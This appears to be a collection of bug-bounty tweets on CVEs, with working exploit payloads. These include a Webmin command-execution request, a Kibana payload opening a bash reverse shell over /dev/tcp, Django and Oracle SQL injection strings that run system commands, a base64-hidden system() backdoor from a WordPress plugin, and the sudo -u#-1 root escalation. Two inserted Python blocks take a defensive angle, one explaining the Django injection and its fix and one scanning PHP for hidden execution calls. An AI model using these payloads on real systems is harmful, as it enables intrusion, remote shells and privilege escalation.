CVE-2020-5902 allows unauthenticated attackers to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
👇just an example
CVE-2019-15642 another Webmin Remote Code Execution (authenticated)
1. set User-Agent to webmin
2. set Authorization
3. set payload:
OBJECT CGI;print "Content-Type: chybeta\n\n";$cmd=`id`;print "$cmd";
4. post to /rpc.cgi
CVE-2019-7609 If you can't pop a shell via the last tweet, you can change the PoC like 👇
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
#BugBountyTips
#BugBounty
#bugbountytip
Apache Tomcat AJP Vulnerability (CNVD-2020-10487/CVE-2020-1938). This vulnerability was discovered by a security researcher at Chaitin Tech.
You can read any webapp's files or include a file to get RCE. JUST A POC-GIF with no DETAILS
Tomcat has fixed this vulnerability, UPDATE!
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that use the `toBSON` method
however, there are lots of no-auth mongo-express instances ...
shodan:
poc:
EXP for CVE-2019-14234 Django JSONField SQL Injection
Step 1:
?data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) -- OR ....
Step 2:
?data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping ' -- OR ...
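Why the two steps above work, as an added illustration (this is not Django's code and not the tweet author's): a simplified re-implementation of the JSONField key lookup in the pre-fix and post-fix shapes. Before the fix, a non-integer key name from a `field__key` lookup was wrapped in single quotes and %-formatted straight into the SQL text, so a quote inside the key closes the literal and the `;` that follows starts a second statement (CREATE TABLE in Step 1, COPY ... FROM PROGRAM in Step 2). After the fix the key travels as a bound parameter. The `"dog"` table name is hypothetical, and the `?` in the payload is Postgres's jsonb existence operator, which is what keeps the boolean expression syntactically valid before the `OR`.

```python
"""Why CVE-2019-14234 works: the JSONField key name is pasted into the SQL text.

Simplified re-implementation for illustration only; this is not Django's code.
"""
from urllib.parse import unquote

# Constructed inputs: the admin changelist GET parameter *names* from Step 1 and Step 2
# above, as sent on the wire (percent-encoded). The parameter's value does not matter.
STEP1_PARAM = "data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) --"
STEP2_PARAM = "data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping ' --"


def key_transform_vulnerable(lhs: str, key_name: str) -> tuple:
    """Pre-fix shape: a non-integer key is wrapped in single quotes by %-formatting."""
    try:
        int(key_name)
        lookup = key_name            # integer index into a JSON array
    except ValueError:
        lookup = "'%s'" % key_name   # the key text lands in the SQL unescaped
    return "(%s -> %s)" % (lhs, lookup), []


def key_transform_fixed(lhs: str, key_name: str) -> tuple:
    """Post-fix shape: the key is a bound parameter (psycopg2 uses %s placeholders)."""
    try:
        lookup = int(key_name)
    except ValueError:
        lookup = key_name
    return "(%s -> %%s)" % lhs, [lookup]


def build_query(param: str, value: str, fixed: bool) -> tuple:
    """Turn a 'field__key' lookup into a SELECT against a hypothetical "dog" table."""
    field, _, key = unquote(param).partition("__")
    transform = key_transform_fixed if fixed else key_transform_vulnerable
    expr, params = transform('"%s"' % field, key)
    sql = 'SELECT * FROM "dog" WHERE %s = %%s' % expr
    return sql, params + [value]


def unquoted_semicolons(sql: str) -> int:
    """Count ';' outside single-quoted literals ('' is an escaped quote).

    One or more means the key broke out of its literal and appended a statement.
    """
    count, in_str, i = 0, False, 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            if in_str and sql[i + 1:i + 2] == "'":
                i += 2
                continue
            in_str = not in_str
        elif ch == ";" and not in_str:
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    for name, param in (("Step 1", STEP1_PARAM), ("Step 2", STEP2_PARAM)):
        for fixed in (False, True):
            sql, params = build_query(param, "x", fixed)
            label = "fixed" if fixed else "vulnerable"
            print(f"{name} {label}: {unquoted_semicolons(sql)} injected statement(s)")
            print(f"  {sql}\n  params={params}")
```

Running it shows the vulnerable query ending in `;CREATE table cmd_exec(cmd_output text) --') = %s`, where the `--` comments out the remainder of Django's own WHERE clause, while the fixed query is always `("data" -> %s) = %s` with the whole key sitting in the parameter list.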
Apache Struts RCE: S2-059 / CVE-2019-0230
Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
backdoor in fake super socialat plugin (/wp-content/plugins/super-socialat/super_socialat.php)
base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") =>
system("whoami");
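A quick way to catch this class of backdoor in a plugin directory, as an added example (not the plugin's code and not from the tweet): decode every `base64_decode("...")` literal in a PHP file and report the ones that decode to a command or code execution call, or that are fed straight into `eval`/`assert`. The sample file below is constructed to have the shape of the backdoor above; the function names in the regexes are the usual PHP execution sinks.

```python
"""Spot base64-wrapped command execution in PHP files, like the backdoor above.

Added illustration, not the plugin's code: decodes every base64_decode("...") literal
and reports those that decode to, or are passed into, a code/command execution function.
"""
import base64
import binascii
import re
from typing import Optional

# Constructed sample in the shape of a backdoored plugin (not the real super_socialat.php).
SAMPLE_PHP = r'''<?php
/* Plugin Name: Super Socialat */
function ss_render() { echo "share"; }
@eval(base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs="));
$greeting = base64_decode("aGVsbG8gd29ybGQ=");  // benign: "hello world"
'''

B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/]+={0,2})["\']\s*\)')
EXEC_CALL = re.compile(r'\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(')
EVAL_OF_DECODE = re.compile(r'\b(eval|assert)\s*\(\s*base64_decode\s*\(')


def decode_literal(encoded: str) -> Optional[str]:
    """Strictly decode a base64 literal; None if it is not valid base64."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def scan_php(src: str) -> list:
    """Return one finding per suspicious base64_decode() call: line, encoded, decoded, reasons."""
    findings = []
    for line_no, line in enumerate(src.splitlines(), start=1):
        for m in B64_CALL.finditer(line):
            decoded = decode_literal(m.group(1))
            if decoded is None:
                continue
            reasons = []
            if EXEC_CALL.search(decoded):
                reasons.append("decodes to a code/command execution call")
            if EVAL_OF_DECODE.search(line):
                reasons.append("decoded string is passed straight to eval/assert")
            if reasons:
                findings.append({"line": line_no, "encoded": m.group(1),
                                 "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP):
        print(f"line {f['line']}: base64_decode(\"{f['encoded']}\") -> {f['decoded']!r}")
        for reason in f["reasons"]:
            print(f"  - {reason}")
```

On the sample it flags only line 4 (decoding to `system("whoami");` and wrapped in `eval`), and leaves the benign "hello world" literal alone; point `scan_php` at the contents of each `.php` file under `wp-content/plugins/` to triage a real install.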
POC:
http://localhost:8000/test/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v%24instance)) from dual) is null%20 OR (1%2B1
analysis:
The version used by Hacking Team and this bank had the vulnerable bash version, but the CGI requests did not trigger Shellshock, except for requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh.
nnnnday - -
CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.
Exploiting ASP.NET TemplateParser to get RCE in Sitecore (CVE-2023-35813) and SharePoint (CVE-2023-33160) by @mwulftange in two parts: part 1 at is live now and part 2 will follow in a few days... stay tuned!
CVE-2020-5405: Directory Traversal with spring-cloud-config-server. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
Advisory:
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
FIX:
Hey look, I've just found a seRioUs vulnerability in Java's System.out.println() method
Just by executing System.out.println() with a malicious Object whose toString() method is overridden, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)
CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server
Don't use, and never use, this vulnerability lightly, because it is a master of data cleaning
CVE-2020-25592 Any value for "eauth"/"token" allows a user to bypass auth and make calls to Salt SSH.
CVE-2020-16846 A user could use shell injections with the Salt API using the SSH Client.
25592+16846=Unauth RCE
Analysis
CVE-2019-14287 sudo -u#-1 xxxx
This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.